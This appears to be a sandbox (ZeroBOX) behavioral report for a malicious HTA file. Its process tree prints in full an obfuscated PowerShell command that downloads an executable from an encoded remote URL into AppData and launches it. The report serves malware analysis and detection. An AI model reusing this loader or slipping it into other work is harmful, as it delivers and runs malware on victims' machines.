| ZeroBOX

Behavioral Analysis

Process tree (indentation shows parent → child; the number under each entry is its process ID)

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\bazila.hta.html

    2612
    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2612 CREDAT:145409

      2700
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zJf($Qam, $lyA){[IO.File]::WriteAllBytes($Qam, $lyA)};function TPk($Qam){if($Qam.EndsWith((ANO @(4660,4714,4722,4722))) -eq $True){rundll32.exe $Qam }elseif($Qam.EndsWith((ANO @(4660,4726,4729,4663))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $Qam}elseif($Qam.EndsWith((ANO @(4660,4723,4729,4719))) -eq $True){misexec /qn /i $Qam}else{Start-Process $Qam}};function Zbf($iVo){$MvJ = New-Object (ANO @(4692,4715,4730,4660,4701,4715,4712,4681,4722,4719,4715,4724,4730));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$lyA = $MvJ.DownloadData($iVo);return $lyA};function ANO($DIw){$DYi=4614;$lSF=$Null;foreach($Mze in $DIw){$lSF+=[char]($Mze-$DYi)};return $lSF};function bID(){$kPn = $env:AppData + '\';;;$mUBIuDwhhjWEPp = $kPn + 'eee.exe'; if (Test-Path -Path $mUBIuDwhhjWEPp){TPk $mUBIuDwhhjWEPp;}Else{ $HgTkSNV = Zbf (ANO @(4718,4730,4730,4726,4729,4672,4661,4661,4736,4735,4726,4668,4712,4715,4665,4733,4735,4713,4662,4663,4660,4725,4724,4715,4659,4713,4722,4719,4713,4721,4728,4660,4719,4713,4731,4661,4715,4715,4715,4660,4715,4734,4715));zJf $mUBIuDwhhjWEPp $HgTkSNV;TPk $mUBIuDwhhjWEPp;};;}bID;

        2924
